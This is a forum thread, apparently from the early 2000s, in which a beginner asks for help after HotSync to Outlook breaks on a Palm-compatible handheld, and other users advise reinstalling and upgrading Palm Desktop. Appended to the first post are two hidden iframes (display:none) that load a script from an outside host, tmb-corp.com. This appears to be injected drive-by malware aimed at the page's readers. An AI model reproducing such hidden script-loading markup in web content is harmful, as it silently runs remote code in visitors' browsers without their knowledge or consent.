+ Reply to Thread

Unhappy Messed up isntallation-can't hot sync

Hi! I am a beginner with a new 1300. All was working, including my Hot Sync, until today I got a message while sync’g that said that my Outlook was not connecting, or something to that effect. The message told me to go to Outlook and delete the PocketMirror and then re-sync. I found the mirror, deleted it and all its connections, and re-synced. You guessed it! Nothing happened. Now I don’t know what to do? Please advise….slowly. Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Beams from above...
    I haven't seen this patricular problem before, but if it was me, I would remove the Hotsync program and Palm Desktop (either through the Start menu or Add/Remove Programs in the Control Panel) and reinstall everything again from scratch.

Your data is safe, so you can be confident in starting over with a clean install of the Palm software.

Let me know if you need more detailed instructions...

John

Administrator

Arrow

also, go to palm.com and get the updated palm DESKTOP software 4.0.1.. its waay better than 3.x and it will back up your user installed apps and such...
    Last edited by Marctronixx; 12-28-2001 at 05:24 PM.

Hey, nobody told me my mother was here! Now I can't have fun anymore. :o

Yeah, sounds like you should uninstall and then reinstall. I don't know why you were told to delete Pocket Mirror.

Question Messed up isntallation-can't hot sync

Thanks forthe responses to my quest. I went to Palm.com as suggested and they have Desktop for 500 series, 100 series or all other. If I have the 1300, which series do I have? Sorry to be so confused, but I was honest about my techie aptitude in the beginning. Remember? Thanks again. Please advise.

Beams from above...
    Well...

I can't say for certain, but if it was me, I would get the one offered for the M505; it seems that this is the Palm that is most compatible with the Samsung.

Worst case scenario, you could always Uninstall and go back to the original version included in the box with your I300.

I wonder if the Samsung website offers a 4.01 upgrade? My I300 shipped with 4.01.

John